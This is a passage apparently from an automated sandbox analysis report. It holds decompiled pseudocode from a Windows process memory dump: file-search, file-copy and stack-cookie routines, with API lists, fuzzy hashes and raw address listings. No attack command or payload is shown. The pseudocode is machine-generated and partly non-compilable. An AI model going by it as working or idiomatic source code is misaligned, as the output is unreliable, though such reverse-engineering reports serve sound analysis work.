                                                      											_t97 = _t99 + _t61 * 2;
                                                      											memmove(_t97, _t99, (_t86 - _t96 >> 1) + (_t86 - _t96 >> 1) + 1);
                                                      											_t105 = _t105 + 0xc;
                                                      											_t99 = _t97;
                                                      										}
                                                      										_t98 = _t76 + _t76;
                                                      										memcpy(_v604, _v608, _t98);
                                                      										_v604 = _v604 + _t98;
                                                      										_t105 = _t105 + 0xc;
                                                      										E4A73185A(_v604, _a8 - (_v604 - _v616 >> 1), _t99);
                                                      										_v604 = _v604 + 2;
                                                      										_t101 = _v604;
                                                      										_t95 = _v616;
                                                      										_t75 = _v620;
                                                      										goto L9;
                                                      									}
                                                      									goto L30;
                                                      								} else {
                                                      									L15:
                                                      									_t57 =  &(_v600.cFileName);
                                                      								}
                                                      								L16:
                                                      								_v608 = _t57;
                                                      								_t17 = _t57 + 2; // 0x2
                                                      								_t94 = _t17;
                                                      								do {
                                                      									_t78 =  *_t57;
                                                      									_t57 = _t57 + 2;
                                                      									__eflags = _t78;
                                                      								} while (_t78 != 0);
                                                      								goto L18;
                                                      							}
                                                      							L30:
                                                      						} else {
                                                      							__eflags = _t75 -  *0x4a770664; // 0x5c
                                                      							if(__eflags == 0) {
                                                      								goto L13;
                                                      							} else {
                                                      								goto L9;
                                                      							}
                                                      						}
                                                      						L11:
                                                      						_pop(_t77);
                                                      						_pop(_t103);
                                                      						goto L12;
                                                      						L9:
                                                      						_t99 = _t101 + 2;
                                                      					} while (_t75 != 0);
                                                      					_t54 = 1;
                                                      					goto L11;
                                                      				}
                                                      				L12:
                                                      				return E4A7313A9(_t54, _t77, _v8 ^ _t104, _t94, _t95, _t103);
                                                      				goto L30;
                                                      			}

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
                                                      • String ID:
                                                      • API String ID: 242869866-0
                                                      • Opcode ID: 7f5ab4f4971a5158844d11dc7c0c6b3355f38757be18432e4a7701fb74ef65e5
                                                      • Instruction ID: 61905d0a3da01001e01cf63473961b8f3dc6b440c5b7ebfa2a956062a57ca01a
                                                      • Opcode Fuzzy Hash: 7f5ab4f4971a5158844d11dc7c0c6b3355f38757be18432e4a7701fb74ef65e5
                                                      • Instruction Fuzzy Hash: 5F51C631905A2ADBCF74CF64CC88AEEBBB8FF45315F024299E845E7151E7709A89CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 55%
                                                      			E4A7418A6(signed int __edx, intOrPtr _a4) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				long* _v16;
                                                      				void _v20;
                                                      				long _v24;
                                                      				void _v28;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				signed int _t17;
                                                      				intOrPtr _t21;
                                                      				intOrPtr _t23;
                                                      				long _t26;
                                                      				void* _t38;
                                                      				void* _t41;
                                                      
                                                      				_t42 = __edx;
                                                      				_v16 = 0;
                                                      				_t17 = E4A74103D(2) & 0x000000ff;
                                                      				_push(0);
                                                      				 *0x4a75415c = _t17;
                                                      				L4A731BC7();
                                                      				_t41 = 0x4a754ac0;
                                                      				if(_t17 != 0) {
                                                      					return 1;
                                                      				}
                                                      				E4A732C56(_t38, __edx, 0, 0x4a755260, 0x104, 0);
                                                      				_t21 =  *0x4a754134; // 0x0
                                                      				 *0x4a7541e8 = 1;
                                                      				 *0x4a7541f0 = 1;
                                                      				 *0x4a754164 = 0;
                                                      				 *0x4a754168 = 1;
                                                      				 *0x4a75409c = 1;
                                                      				 *0x4a7540e8 = 0;
                                                      				 *0x4a7540ec = 0;
                                                      				 *0x4a7540f0 = 0;
                                                      				 *0x4a754160 = _t21;
                                                      				_v8 = E4A7419DD();
                                                      				_t23 = E4A7419DD();
                                                      				_push(_t23);
                                                      				_push(_v8);
                                                      				_v12 = _t23;
                                                      				_push(_a4);
                                                      				E4A7419F4();
                                                      				_t26 = NtQueryInformationProcess(0xffffffff, 0x27,  &_v28, 4, 0);
                                                      				_v24 = _t26;
                                                      				if(_t26 >= 0) {
                                                      					_v20 = 2;
                                                      					NtSetInformationProcess(0xffffffff, 0x27,  &_v20, 4);
                                                      				}
                                                      				_push(_v12);
                                                      				_push(_v8);
                                                      				if( *0x4a754168 == 4) {
                                                      					E4A74F6CF(_t42);
                                                      				} else {
                                                      					_v16 = E4A7412D2(_t42);
                                                      				}
                                                      				if(_v24 >= 0) {
                                                      					NtSetInformationProcess(0xffffffff, 0x27,  &_v28, 4);
                                                      				}
                                                      				E4A7399E1(_t41, 0x2336, 1, E4A739A2C("%9d",  *0x4a754164));
                                                      				 *0x4a75415c = E4A74103D(2) & 0x000000ff;
                                                      				return _v16;
                                                      			}

                                                      APIs
                                                      • _setjmp3.MSVCRT ref: 4A7418CB
                                                        • Part of subcall function 4A732C56: GetCurrentDirectoryW.KERNEL32(00000000,?,74EC1AE8), ref: 4A732C7B
                                                      • NtQueryInformationProcess.NTDLL ref: 4A74194E
                                                      • NtSetInformationProcess.NTDLL ref: 4A741972
                                                      • NtSetInformationProcess.NTDLL ref: 4A74199E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: InformationProcess$CurrentDirectoryQuery_setjmp3
                                                      • String ID: %9d
                                                      • API String ID: 992017704-2241623522
                                                      • Opcode ID: 7304724a0629916ff1e83a408a131f1418ed0f2d3db1256cee3e694b5af87eb3
                                                      • Instruction ID: 8e2530d485a0a407633b0d39b8e1370533bd1122c03076ba3899a1a6becf2345
                                                      • Opcode Fuzzy Hash: 7304724a0629916ff1e83a408a131f1418ed0f2d3db1256cee3e694b5af87eb3
                                                      • Instruction Fuzzy Hash: 2831C3F1C89265BBD730EFA5CC0ADEABFBDEB56351F100116E224DA992D7704908CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
                                                      			E4A74F6CF(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                      				signed int _v8;
                                                      				short _v528;
                                                      				char _v1048;
                                                      				char _v1568;
                                                      				void* _v1572;
                                                      				char _v1576;
                                                      				intOrPtr* _v1580;
                                                      				char _v1584;
                                                      				void* _v1588;
                                                      				signed int _v1592;
                                                      				intOrPtr _v1596;
                                                      				intOrPtr _v1600;
                                                      				char _v1604;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t122;
                                                      				intOrPtr* _t126;
                                                      				signed int _t127;
                                                      				signed int _t128;
                                                      				signed int _t132;
                                                      				void* _t136;
                                                      				void* _t139;
                                                      				signed int _t140;
                                                      				signed int _t143;
                                                      				signed int _t153;
                                                      				signed char _t158;
                                                      				signed int _t162;
                                                      				void* _t164;
                                                      				signed int _t168;
                                                      				signed int _t172;
                                                      				signed int _t178;
                                                      				signed int _t181;
                                                      				void* _t184;
                                                      				signed int _t185;
                                                      				void* _t188;
                                                      				signed int _t195;
                                                      				void* _t197;
                                                      				signed int _t201;
                                                      				void* _t204;
                                                      				void* _t209;
                                                      				signed int _t210;
                                                      				void* _t213;
                                                      				void* _t214;
                                                      				signed int _t218;
                                                      				signed int _t220;
                                                      				intOrPtr _t221;
                                                      				signed int _t222;
                                                      				void* _t223;
                                                      				void* _t229;
                                                      				intOrPtr* _t231;
                                                      				intOrPtr _t232;
                                                      				intOrPtr* _t233;
                                                      				signed int _t234;
                                                      
                                                      				_t229 = __edx;
                                                      				_t122 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t122 ^ _t234;
                                                      				_t232 = _a4;
                                                      				_v1596 = _a8;
                                                      				_t222 = 0;
                                                      				_t230 = 0x80;
                                                      				_t126 = E4A740FEB(0xfe00, 0x80,  &_v1584, 0);
                                                      				_v1580 = _t126;
                                                      				if(_t126 != 0) {
                                                      					__eflags =  *0x4a75415c - _t222; // 0x0
                                                      					if(__eflags == 0) {
                                                      						L6:
                                                      						_t233 =  *((intOrPtr*)(_t232 + 0x20));
                                                      						while(1) {
                                                      							_t127 = E4A736A35(_t222, _t223, _t229,  *_t233);
                                                      							__eflags = _t127;
                                                      							if(_t127 != 0) {
                                                      								break;
                                                      							}
                                                      							_t233 =  *((intOrPtr*)(_t233 + 0x20));
                                                      							__eflags = _t233 - _t222;
                                                      							if(_t233 == _t222) {
                                                      								L63:
                                                      								_t128 = 0;
                                                      								__eflags = 0;
                                                      								L64:
                                                      								return E4A7313A9(_t128, _t222, _v8 ^ _t234, _t229, _t230, _t233);
                                                      							}
                                                      						}
                                                      						E4A733117( *_t233, 0x21,  *((intOrPtr*)(_t233 + 0x18)),  &_v1576);
                                                      						while(1) {
                                                      							 *(_t233 + 0x1c) =  *(_t233 + 0x1c) & 0xffff3fff;
                                                      							_t132 =  *(_t233 + 0x1c);
                                                      							__eflags = _t132 & 0x00000004;
                                                      							if((_t132 & 0x00000004) != 0) {
                                                      								_t218 = _t132 & 0xfffffffb | 0x00000002;
                                                      								__eflags = _t218;
                                                      								 *(_t233 + 0x1c) = _t218;
                                                      							}
                                                      							__eflags =  *0x4a7541b4 - _t222; // 0x0
                                                      							if(__eflags != 0) {
                                                      								break;
                                                      							}
                                                      							_t230 = 0x104;
                                                      							_t136 = E4A74113B(_t223, _t233,  &_v1568, 0x104);
                                                      							__eflags = _t136 - 1;
                                                      							if(_t136 == 1) {
                                                      								break;
                                                      							}
                                                      							E4A7358F3(L"%s\r\n",  *((intOrPtr*)(_t233 + 4)));
                                                      							_pop(_t223);
                                                      							_t139 = E4A741CA5(_t223, _t229, _t233, _v1596,  &_v528, 0x104, _t222);
                                                      							__eflags = _t139 - 1;
                                                      							if(_t139 == 1) {
                                                      								break;
                                                      							}
                                                      							__eflags = _v528 - _t222;
                                                      							if(_v528 == _t222) {
                                                      								L61:
                                                      								_t140 = E4A7395F8( *((intOrPtr*)(_t233 + 0x18)), 0x21, _v1576);
                                                      								__eflags = _t140;
                                                      								if(_t140 != 0) {
                                                      									continue;
                                                      								}
                                                      								E4A732F5C(_v1576);
                                                      								goto L63;
                                                      							}
                                                      							_t143 = E4A74F25D(_t222, _t223,  *((intOrPtr*)(_t233 + 4)),  &_v528);
                                                      							__eflags = _t143;
                                                      							if(_t143 == 0) {
                                                      								_t231 = E4A741F66( *((intOrPtr*)(_t233 + 4)), ( *(_t233 + 0x1c) & 0x00000800) << 0xa);
                                                      								__eflags = _t231 - 0xffffffff;
                                                      								if(_t231 == 0xffffffff) {
                                                      									E4A732F5C(_v1576);
                                                      									L67:
                                                      									E4A74056B(0x6e);
                                                      									L68:
                                                      									_push(1);
                                                      									_push(_t222);
                                                      									L69:
                                                      									L4A74F2D7(_t223);
                                                      									L70:
                                                      									E4A732F5C(_v1576);
                                                      									E4A733AB3(_t231);
                                                      									goto L67;
                                                      								}
                                                      								_t153 = E4A733B03(_t147, _t223, _t231);
                                                      								__eflags = _t153;
                                                      								if(_t153 != 0) {
                                                      									_v1584 = 0x80;
                                                      								}
                                                      								_push( &_v528);
                                                      								_push(_v1572);
                                                      								_push(_t233);
                                                      								_push( &_v1588);
                                                      								_v1600 = E4A7410A5( &_v1588, _t231, _v1580, _v1584);
                                                      								__eflags =  *0x4a754128 - _t222; // 0x0
                                                      								if(__eflags != 0) {
                                                      									goto L70;
                                                      								} else {
                                                      									_t158 = GetFileAttributesW( &_v528);
                                                      									__eflags = _t158 & 0x00000002;
                                                      									if((_t158 & 0x00000002) != 0) {
                                                      										_v1572 = E4A74FDFD( &_v528, 1, _t222);
                                                      										L26:
                                                      										__eflags = _v1572 - 0xffffffff;
                                                      										if(_v1572 == 0xffffffff) {
                                                      											goto L70;
                                                      										}
                                                      										__eflags =  *0x4a754120 - _t222; // 0x0
                                                      										if(__eflags == 0) {
                                                      											L33:
                                                      											__eflags = _v1600 - 1;
                                                      											if(_v1600 != 1) {
                                                      												L39:
                                                      												 *0x4a754120 = _t222;
                                                      												E4A733AB3(_t231);
                                                      												L40:
                                                      												 *0x4a7541e8 = _t222;
                                                      												_t231 =  *((intOrPtr*)(_t233 + 0x20));
                                                      												while(1) {
                                                      													__eflags = _t231 - _t222;
                                                      													if(_t231 == _t222) {
                                                      														break;
                                                      													}
                                                      													_t162 =  *(_t231 + 0x1c);
                                                      													__eflags = _t162 & 0x00000004;
                                                      													if((_t162 & 0x00000004) != 0) {
                                                      														_t195 = _t162 & 0xfffffffb | 0x00000002;
                                                      														__eflags = _t195;
                                                      														 *(_t231 + 0x1c) = _t195;
                                                      													}
                                                      													_t164 = E4A741D9B(_t223,  &_v1048, 0x104,  *_t231,  *((intOrPtr*)(_t233 + 4)));
                                                      													__eflags = _t164 - _t222;
                                                      													if(_t164 == _t222) {
                                                      														E4A7358F3(L"%s\r\n",  &_v1048);
                                                      													} else {
                                                      														_push(_t222);
                                                      														_push(_t164);
                                                      														E4A7399E1(_t223);
                                                      													}
                                                      													_pop(_t223);
                                                      													_t168 = E4A736A35(_t222, _t223, _t229,  &_v1048);
                                                      													__eflags = _t168;
                                                      													if(_t168 == 0) {
                                                      														L58:
                                                      														_t231 =  *((intOrPtr*)(_t231 + 0x20));
                                                      														continue;
                                                      													} else {
                                                      														_t172 = E4A74F25D(_t222, _t223,  &_v1048,  &_v528);
                                                      														_push(_t222);
                                                      														__eflags = _t172;
                                                      														if(_t172 == 0) {
                                                      															_push( &_v1048);
                                                      															_t222 = E4A741F66();
                                                      															__eflags = _t222 - 0xffffffff;
                                                      															if(_t222 == 0xffffffff) {
                                                      																E4A732F5C(_v1576);
                                                      																E4A733AB3(_v1572);
                                                      																E4A74056B(0x6e);
                                                      																L72:
                                                      																_push(1);
                                                      																_push(0);
                                                      																goto L69;
                                                      															}
                                                      															_t178 = E4A733B03(_t174, _t223, _t222);
                                                      															__eflags = _t178;
                                                      															if(_t178 != 0) {
                                                      																_v1584 = 0x80;
                                                      															}
                                                      															while(1) {
                                                      																__eflags =  *0x4a754120;
                                                      																if( *0x4a754120 != 0) {
                                                      																	break;
                                                      																}
                                                      																_push( &_v528);
                                                      																_push(_v1572);
                                                      																_push(_t231);
                                                      																_push( &_v1588);
                                                      																_t181 = E4A7410A5( &_v1588, _t222, _v1580, _v1584);
                                                      																__eflags = _t181;
                                                      																if(_t181 == 0) {
                                                      																	break;
                                                      																}
                                                      																_t184 = E4A74F619(_v1572, _v1580, _v1588,  &_v528, _t222);
                                                      																__eflags =  *0x4a75415c;
                                                      																if( *0x4a75415c == 0) {
                                                      																	continue;
                                                      																}
                                                      																_t185 = E4A733B03(_t184, _t223, _v1572);
                                                      																__eflags = _t185;
                                                      																if(_t185 != 0) {
                                                      																	continue;
                                                      																}
                                                      																_t188 = E4A74F46A( &_v1572,  &_v528, _v1588, _v1580, _v1592);
                                                      																__eflags = _t188 - 1;
                                                      																if(_t188 == 1) {
                                                      																	E4A732F5C(_v1576);
                                                      																	E4A733AB3(_t222);
                                                      																	E4A733AB3(_v1572);
                                                      																	goto L72;
                                                      																}
                                                      															}
                                                      															 *0x4a754120 =  *0x4a754120 & 0x00000000;
                                                      															E4A733AB3(_t222);
                                                      															_t222 = 0;
                                                      															__eflags = 0;
                                                      															goto L58;
                                                      														}
                                                      														E4A7399E1(_t223);
                                                      														_t223 = 0x2340;
                                                      														goto L58;
                                                      													}
                                                      												}
                                                      												E4A741BE3(_t233, _v1596, _v1572, _t222);
                                                      												 *0x4a7541f0 = 1;
                                                      												goto L61;
                                                      											}
                                                      											_t197 = E4A74F619(_v1572, _v1580, _v1588,  &_v528, _t231);
                                                      											__eflags =  *0x4a75415c - _t222; // 0x0
                                                      											if(__eflags == 0) {
                                                      												L37:
                                                      												_push( &_v528);
                                                      												_push(_v1572);
                                                      												_push(_t233);
                                                      												_push( &_v1588);
                                                      												_v1600 = E4A7410A5( &_v1588, _t231, _v1580, _v1584);
                                                      												L38:
                                                      												__eflags =  *0x4a754120 - _t222; // 0x0
                                                      												if(__eflags == 0) {
                                                      													goto L33;
                                                      												}
                                                      												goto L39;
                                                      											}
                                                      											_t201 = E4A733B03(_t197, _t223, _v1572);
                                                      											__eflags = _t201;
                                                      											if(_t201 != 0) {
                                                      												goto L37;
                                                      											}
                                                      											_t204 = E4A74F46A( &_v1572,  &_v528, _v1588, _v1580, _v1592);
                                                      											__eflags = _t204 - 1;
                                                      											if(_t204 == 1) {
                                                      												L32:
                                                      												E4A732F5C(_v1576);
                                                      												E4A733AB3(_t231);
                                                      												E4A733AB3(_v1572);
                                                      												goto L68;
                                                      											}
                                                      											goto L37;
                                                      										}
                                                      										__eflags = _v1588 - _t222;
                                                      										if(_v1588 <= _t222) {
                                                      											goto L38;
                                                      										}
                                                      										_t209 = E4A74F619(_v1572, _v1580, _v1588,  &_v528, _t231);
                                                      										__eflags =  *0x4a75415c - _t222; // 0x0
                                                      										if(__eflags == 0) {
                                                      											goto L38;
                                                      										}
                                                      										_t210 = E4A733B03(_t209, _t223, _v1572);
                                                      										__eflags = _t210;
                                                      										if(_t210 != 0) {
                                                      											goto L38;
                                                      										}
                                                      										_t213 = E4A74F46A( &_v1572,  &_v528, _v1588, _v1580, _v1592);
                                                      										__eflags = _t213 - 1;
                                                      										if(_t213 != 1) {
                                                      											goto L38;
                                                      										}
                                                      										goto L32;
                                                      									}
                                                      									_t214 = E4A74224D(_t223,  &_v528);
                                                      									_v1572 = _t214;
                                                      									__eflags = _t214 - 0xffffffff;
                                                      									if(_t214 == 0xffffffff) {
                                                      										goto L70;
                                                      									}
                                                      									__imp___get_osfhandle();
                                                      									_t223 = _t214;
                                                      									SetEndOfFile(_t214);
                                                      									goto L26;
                                                      								}
                                                      							}
                                                      							_v1572 = E4A74F354( *((intOrPtr*)(_t233 + 4)), _t233, _v1580, _v1584);
                                                      							goto L40;
                                                      						}
                                                      						E4A732F5C(_v1576);
                                                      						goto L1;
                                                      					}
                                                      					_t220 = E4A740FEB(_v1584, 0x80,  &_v1604, 1);
                                                      					_v1592 = _t220;
                                                      					__eflags = _t220;
                                                      					if(_t220 == 0) {
                                                      						goto L1;
                                                      					} else {
                                                      						_t221 = _v1604;
                                                      						__eflags = _v1584 - _t221;
                                                      						if(_v1584 >= _t221) {
                                                      							_v1584 = _t221;
                                                      						}
                                                      						goto L6;
                                                      					}
                                                      				}
                                                      				L1:
                                                      				_t128 = 1;
                                                      				goto L64;
                                                      			}

























































                                                      0x4a74f8ff
                                                      0x4a74f99e
                                                      0x4a74f99e
                                                      0x4a74f9a5
                                                      0x4a74fa48
                                                      0x4a74fa49
                                                      0x4a74fa4f
                                                      0x4a74fa54
                                                      0x4a74fa54
                                                      0x4a74fa5a
                                                      0x4a74fbc8
                                                      0x4a74fbc8
                                                      0x4a74fbca
                                                      0x00000000
                                                      0x00000000
                                                      0x4a74fa62
                                                      0x4a74fa65
                                                      0x4a74fa67
                                                      0x4a74fa6c
                                                      0x4a74fa6c
                                                      0x4a74fa6f
                                                      0x4a74fa6f
                                                      0x4a74fa83
                                                      0x4a74fa88
                                                      0x4a74fa8a
                                                      0x4a74faa1
                                                      0x4a74fa8c
                                                      0x4a74fa8c
                                                      0x4a74fa8d
                                                      0x4a74fa8e
                                                      0x4a74fa8e
                                                      0x4a74faa7
                                                      0x4a74faaf
                                                      0x4a74fab4
                                                      0x4a74fab6
                                                      0x4a74fbc5
                                                      0x4a74fbc5
                                                      0x00000000
                                                      0x4a74fabc
                                                      0x4a74faca
                                                      0x4a74facf
                                                      0x4a74fad0
                                                      0x4a74fad2
                                                      0x4a74faeb
                                                      0x4a74faf1
                                                      0x4a74faf3
                                                      0x4a74faf6
                                                      0x4a74fc66
                                                      0x4a74fc71
                                                      0x4a74fc78
                                                      0x4a74fc7d
                                                      0x4a74fc7d
                                                      0x4a74fc7f
                                                      0x00000000
                                                      0x4a74fc7f
                                                      0x4a74fafd
                                                      0x4a74fb02
                                                      0x4a74fb04
                                                      0x4a74fb0a
                                                      0x4a74fb0a
                                                      0x4a74fba9
                                                      0x4a74fba9
                                                      0x4a74fbb0
                                                      0x00000000
                                                      0x00000000
                                                      0x4a74fb1f
                                                      0x4a74fb20
                                                      0x4a74fb2c
                                                      0x4a74fb2d
                                                      0x4a74fb3b
                                                      0x4a74fb40
                                                      0x4a74fb42
                                                      0x00000000
                                                      0x00000000
                                                      0x4a74fb5e
                                                      0x4a74fb63
                                                      0x4a74fb6a
                                                      0x00000000
                                                      0x00000000
                                                      0x4a74fb72
                                                      0x4a74fb77
                                                      0x4a74fb79
                                                      0x00000000
                                                      0x00000000
                                                      0x4a74fb9b
                                                      0x4a74fba0
                                                      0x4a74fba3
                                                      0x4a74fc89
                                                      0x4a74fc8f
                                                      0x4a74fc9a
                                                      0x00000000
                                                      0x4a74fc9a
                                                      0x4a74fba3
                                                      0x4a74fbb6
                                                      0x4a74fbbe
                                                      0x4a74fbc3
                                                      0x4a74fbc3
                                                      0x00000000
                                                      0x4a74fbc3
                                                      0x4a74fad9
                                                      0x4a74fadf
                                                      0x00000000
                                                      0x4a74fadf
                                                      0x4a74fab6
                                                      0x4a74fbde
                                                      0x4a74fbe3
                                                      0x00000000
                                                      0x4a74fbe3
                                                      0x4a74f9c5
                                                      0x4a74f9ca
                                                      0x4a74f9d0
                                                      0x4a74fa0f
                                                      0x4a74fa15
                                                      0x4a74fa16
                                                      0x4a74fa22
                                                      0x4a74fa23
                                                      0x4a74fa36
                                                      0x4a74fa3c
                                                      0x4a74fa3c
                                                      0x4a74fa42
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a74fa42
                                                      0x4a74f9d8
                                                      0x4a74f9dd
                                                      0x4a74f9df
                                                      0x00000000
                                                      0x00000000
                                                      0x4a74fa01
                                                      0x4a74fa06
                                                      0x4a74fa09
                                                      0x4a74f97d
                                                      0x4a74f983
                                                      0x4a74f989
                                                      0x4a74f994
                                                      0x00000000
                                                      0x4a74f994
                                                      0x00000000
                                                      0x4a74fa09
                                                      0x4a74f905
                                                      0x4a74f90b
                                                      0x00000000
                                                      0x00000000
                                                      0x4a74f92b
                                                      0x4a74f930
                                                      0x4a74f936
                                                      0x00000000
                                                      0x00000000
                                                      0x4a74f942
                                                      0x4a74f947
                                                      0x4a74f949
                                                      0x00000000
                                                      0x00000000
                                                      0x4a74f96f
                                                      0x4a74f974
                                                      0x4a74f977
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a74f977
                                                      0x4a74f8b8
                                                      0x4a74f8bd
                                                      0x4a74f8c3
                                                      0x4a74f8c6
                                                      0x00000000
                                                      0x00000000
                                                      0x4a74f8cd
                                                      0x4a74f8d3
                                                      0x4a74f8d5
                                                      0x00000000
                                                      0x4a74f8d5
                                                      0x4a74f89a
                                                      0x4a74f829
                                                      0x00000000
                                                      0x4a74f829
                                                      0x4a74fc29
                                                      0x00000000
                                                      0x4a74fc29
                                                      0x4a74f737
                                                      0x4a74f73c
                                                      0x4a74f742
                                                      0x4a74f744
                                                      0x00000000
                                                      0x4a74f746
                                                      0x4a74f746
                                                      0x4a74f74c
                                                      0x4a74f752
                                                      0x4a74f754
                                                      0x4a74f754
                                                      0x00000000
                                                      0x4a74f752
                                                      0x4a74f744
                                                      0x4a74f717
                                                      0x4a74f719
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID: %s
                                                      • API String ID: 4275171209-3043279178
                                                      • Opcode ID: a9e5fea68f241675133149b79f92d5615f49a3767a0768e9e8ae651dee12ba17
                                                      • Instruction ID: 9a96a9c590b3916e5c3760d42a99b00132ed7170bb6b88919143117070285956
                                                      • Opcode Fuzzy Hash: a9e5fea68f241675133149b79f92d5615f49a3767a0768e9e8ae651dee12ba17
                                                      • Instruction Fuzzy Hash: B4E188B2809629AEDF319F60CD44EDE7B7AFF49710F0101D5E509A6092D732AAADCF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E4A7313A9(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                      				intOrPtr _v0;
                                                      				void* _v804;
                                                      				intOrPtr _v808;
                                                      				intOrPtr _v812;
                                                      				intOrPtr _t11;
                                                      				intOrPtr _t12;
                                                      				intOrPtr _t13;
                                                      				intOrPtr* _t26;
                                                      				void* _t29;
                                                      
                                                      				_t29 = __ecx -  *0x4a7540ac; // 0xbb40e64e
                                                      				if(_t29 != 0) {
                                                      					 *0x4a754388 = __eax;
                                                      					 *0x4a754384 = __ecx;
                                                      					 *0x4a754380 = __edx;
                                                      					 *0x4a75437c = __ebx;
                                                      					 *0x4a754378 = __esi;
                                                      					 *0x4a754374 = __edi;
                                                      					 *0x4a7543a0 = ss;
                                                      					 *0x4a754394 = cs;
                                                      					 *0x4a754370 = ds;
                                                      					 *0x4a75436c = es;
                                                      					 *0x4a754368 = fs;
                                                      					 *0x4a754364 = gs;
                                                      					asm("pushfd");
                                                      					_pop( *0x4a754398);
                                                      					 *0x4a75438c =  *_t26;
                                                      					 *0x4a754390 = _v0;
                                                      					 *0x4a75439c =  &_a4;
                                                      					 *0x4a7542d8 = 0x10001;
                                                      					_t11 =  *0x4a754390; // 0x0
                                                      					 *0x4a754294 = _t11;
                                                      					 *0x4a754288 = 0xc0000409;
                                                      					 *0x4a75428c = 1;
                                                      					_t12 =  *0x4a7540ac; // 0xbb40e64e
                                                      					_v812 = _t12;
                                                      					_t13 =  *0x4a7540b0; // 0x44bf19b1
                                                      					_v808 = _t13;
                                                      					SetUnhandledExceptionFilter(0);
                                                      					UnhandledExceptionFilter(E4A7523F8);
                                                      					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                      				} else {
                                                      					return __eax;
                                                      				}
                                                      			}













                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 4A7523D1
                                                      • UnhandledExceptionFilter.KERNEL32(4A7523F8), ref: 4A7523DC
                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 4A7523E7
                                                      • TerminateProcess.KERNEL32(00000000), ref: 4A7523EE
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                      • String ID:
                                                      • API String ID: 3231755760-0
                                                      • Opcode ID: b2e0d18def8911208ac053c7b1bb2b8c61bc788c2465af3d4a53621ac0b5b0bd
                                                      • Instruction ID: f9bfa513563cc0e7dd6da2e78a7a17cf46b99eb1872fcef7477525c3d4fc266b
                                                      • Opcode Fuzzy Hash: b2e0d18def8911208ac053c7b1bb2b8c61bc788c2465af3d4a53621ac0b5b0bd
                                                      • Instruction Fuzzy Hash: AF21CEF98A2320DFD760CFA9D5466487BFEBB4A301B12405AE508E7E20E7705D81DF05
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E4A74BF0C(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, short* _a20) {
                                                      				signed int _v8;
                                                      				struct _WIN32_FIND_DATAW _v600;
                                                      				WCHAR* _v604;
                                                      				void* _v608;
                                                      				intOrPtr _v612;
                                                      				short* _v616;
                                                      				intOrPtr _v620;
                                                      				intOrPtr _v624;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t60;
                                                      				intOrPtr* _t62;
                                                      				signed int _t65;
                                                      				intOrPtr _t66;
                                                      				intOrPtr* _t76;
                                                      				void* _t87;
                                                      				intOrPtr* _t92;
                                                      				intOrPtr* _t93;
                                                      				intOrPtr* _t94;
                                                      				intOrPtr* _t98;
                                                      				WCHAR* _t108;
                                                      				short* _t114;
                                                      				intOrPtr _t117;
                                                      				void* _t123;
                                                      				intOrPtr* _t124;
                                                      				void* _t128;
                                                      				intOrPtr* _t130;
                                                      				intOrPtr* _t131;
                                                      				intOrPtr _t132;
                                                      				signed int _t133;
                                                      				intOrPtr* _t137;
                                                      				void* _t138;
                                                      				intOrPtr _t140;
                                                      				intOrPtr _t141;
                                                      				signed short _t143;
                                                      				short* _t144;
                                                      				signed int _t149;
                                                      
                                                      				_t60 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t60 ^ _t149;
                                                      				_t62 = _a4;
                                                      				_v620 = _a8;
                                                      				_t139 = _a20;
                                                      				_v612 = _a12;
                                                      				_v608 = _t62;
                                                      				_v616 = _t139;
                                                      				_t143 = 0;
                                                      				_t123 = _t62 + 2;
                                                      				do {
                                                      					_t137 =  *_t62;
                                                      					_t62 = _t62 + 2;
                                                      				} while (_t137 != 0);
                                                      				_t65 = _t62 - _t123 >> 1;
                                                      				_t124 = _t139;
                                                      				if( *_t139 == 0) {
                                                      					L7:
                                                      					_t66 = 0;
                                                      				} else {
                                                      					do {
                                                      						_t137 = _t124;
                                                      						do {
                                                      							_t117 =  *_t124;
                                                      							_t124 = _t124 + 2;
                                                      						} while (_t117 != 0);
                                                      						_t116 = (_t124 - _t137 >> 1) + _t65;
